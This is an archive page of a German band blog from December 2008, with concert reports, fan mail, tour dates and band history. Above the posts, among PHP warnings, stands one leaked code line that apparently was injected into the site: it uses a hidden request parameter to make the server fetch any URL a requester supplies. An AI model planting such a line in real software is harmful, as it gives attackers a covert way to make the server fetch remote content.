Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » 2008 » Dezember

Monatsarchiv für Dezember 2008

prost neujahr

Schroeder am 31. Dezember 2008

meint auch Ralf aus (wahrscheinlich) Hamburg, oder um Hamburg herum.
Ok, was sollen wir tun? An Minister Tiefensee weiterleiten? Umbenennungen in großem Stil? “Beracz-Allee”, “Jesus-Promenade”, “Vladi-Park”?
ciao-
richard. Den ganzen Beitrag lesen »

Abgelegt unter Historisches, Schroeder | Keine Kommentare

*ohne worte*

Schroeder am 28. Dezember 2008

frohes_fest

Abgelegt unter Schroeder | Keine Kommentare

superabschluss

Schroeder am 28. Dezember 2008

Dürener Konzert als Superabschluss eines inspirierten SCHROEDER-Jahres.

Zu den Dürener Konzerten erreichten uns einige Kommentare - zunächst von Silke aus Langerwehe:

Hallo, am Samstag haben wir ein wirklich tolles und nachhaltiges Konzert im KOMM gesehen - herzlichen Dank für die gute Zeit!! In Erinnerung an alte Zeiten und für den Anschluss an neue, haben wir uns mit Schroeder-Artikeln eingedeckt, doch leider hat unser knabberwütiger Junghund die Poster zwischen die Zähne bekommen. Gibt es eine Möglichkeit beide Poster zu bestellen oder müssen wir aus Frust den Hund auf Wasser und Brot setzen?

Nein, liebe Silke, da muss der Paketdienst ran! Dem Fiffi kann geholfen werden, so hundejeck wie wir sind!

Und noch diese Meldung von Dieter aus Köln:

Gestern nun konnte ich mir erstmals ein ganzes Konzert der wieder beliebten, bekannten und auch berühmten Band Schroeder Roadshow anschauen. Die als CDŽs noch erhältlichen Alben besitze ich schon seit vielen Jahren. Und natürlich laufen auch die neuen Titel seit Tagen rauf und runter im Auto wie zu Hause. Euer Auftritt gestern war, aber das hast du an der Reaktion des Publikums ja auch gemerkt, absolut phantastisch. Super Mucke, klasse Texte und eine wunderschöne Stimme. Es hat uns prima gefallen, Rockmusik vom feinsten. Man hört es heute leider viel zu selten.

Danke, lieber Dieter, schönen Gruß nach Kölle.

Feine Stadt, dieses Düren, finde ich auch, schließlich bin ich hier aufs Gymnasium gegangen, und dass die arme Stadt im II. Weltkrieg zu 98% zerstört wurde, daran hat sie selbst am wenigsten Schuld. Ein bisschen Geschichte, gefällig? Eine Flugzeugschwadron mit voller Bombenladung der Alliierten war in den letzten Kriegstagen unterwegs, die Rüstungsindustrie von Krupp in Essen zu zerschlagen, als sie infolge schlechten Wetters abdrehen musste. Da die Bomber nicht mit der schweren Ladung landen konnten, wurde die Bombenladung auf dem Rückflug in Düren abgeworfen und die Stadt so fast komplett zerstört. Großzügige Finanzierung beim Nachkriegsaufbau konnte das architektonisch völlig missratene Stadtbild nicht retten. Schon eher trugen die fast fünftausend Schüler der vielen Schulen zu einer gewissen Lebensqualität bei, jedenfalls hatten die Gastronomen schon zu meiner Zeit viel Spaß an der Meute!

Frohe Weihnachten und Prost Neujahr!


Abgelegt unter Konzert, TourTageBuch | Keine Kommentare

luxor köln 10.2.09

Schroeder am 21. Dezember 2008

Am 10. Februar werden wir das legendäre Luxor in Köln rocken. Soviel steht schon mal fest und weitere Infos werden folgen.

Abgelegt unter Konzert | Keine Kommentare

düren 19.12.08 ab 20 uhr

Schroeder am 20. Dezember 2008

Schroeder Roadshow Düren

Die Konzert Fotos |  Den ganzen Beitrag lesen »

Abgelegt unter Konzert, TourTageBuch | Keine Kommentare

wir freuen uns auf düren

Schroeder am 18. Dezember 2008

Wir kommen gerne zurück ins KOMM, wo wir im Sommer unser Live-Programm geprobt haben. Es war eine prima Zeit, mit der Gelegenheit, alle umliegenden Restaurants durchzutesten, wozu wir nur sagen können: Fisch und Portofino gut! Rechtzeitig vor der Annakirmes hatten wir unser Programm stehen und konnten den Kellerschlüssel zurückgeben. Düren, wir kommen zurück!

Abgelegt unter Konzert, TourTageBuch | Keine Kommentare

keine harmonie

Schroeder am 17. Dezember 2008

Einen Tag nach unserem geplanten Auftritt in der Bonner Harmonie.
Wie bekannt ist, haben wir den gig absagen müssen, weil sich Gertys Stimmbänder mit einem Virus infiziert haben. Seine Stimme klang schlimm am Telefon, er war bei seinem Arzt, der ihm drei Tage “Singverbot” ausgesprochen hat, und er hat ihm ein Attest gegeben, falls wir das wegen des Gastspielvertrages brauchen - welcher Gastspielvertrag?
Den ganzen Beitrag lesen »

Abgelegt unter Konzert, TourTageBuch | Ein Kommentar

Mamas und Papas?

Schroeder am 15. Dezember 2008

Nach der Veröffentlichung der SCHROEDER-CD ist doch mehr Beschäftigung mit der Vergangenheit, als ich gedacht habe. 
Die CD wird im Radio nicht gespielt und bei den Zeitungen, die mir wichtig sind, nicht rezensiert. Jürgen Reents, Chefredakteur vom ND, erzählte mir, daß der Rezensent ihrer Rubrik ‘Plattenbau’ (sehr schön, Jürgen!) abgewunken habe, aber daß die CD weitergereicht wurde und sich Kai Degenhardt, Sohnemann und Mitmusiker von Franz-Josef, der Sache annehmen würde - inch Allah. Es scheint also eine Geschmacks- und Generationenfrage zu sein?
Den ganzen Beitrag lesen »

Abgelegt unter TourTageBuch | Ein Kommentar

recording session

Schroeder am 11. Dezember 2008

Konspiratives und streng geheimes Überwachungskameramaterial aus den Studioräumen während der Aufnahmen des neuen Albums. Den ganzen Beitrag lesen »

Abgelegt unter CD Album, Schroeder | Keine Kommentare

Der SCHROEDER-ROCKPALAST wurde 1978 eröffnet:

Schroeder am 11. Dezember 2008

Im Sommer 1978 eröffneten wir in Stolberg-Vicht (Eifel) eine Kneipe mit Saal im ersten Stock. Jetzt sind nicht nur unsere eigenen Tresengäste und schenken uns selbst das Bier aus, sondern machen uns auch gegenseitig Deckel, und noch wichtiger: Wir können im eigenen Laden Musik machen! Zur großen Silvestershow reisen die 3 TORNADOS aus Berlin an. Unvergessen die Bergung ihres kleinen Bandmobils auf der A4 in Höhe Raststätte Frechen, wo die TORNADOS (sic!) infolge heftigsten Wintereinbruchs den Jahreswechsel im Schnee zu verbringen drohten. Ein Glück, daß wir immer den dicken Bus unterm Tor stehen hatten. Wahnsinn, der Winter ‘78/79. Den ganzen Beitrag lesen »

Abgelegt unter Historisches, Schroeder | Keine Kommentare

Nächste Einträge »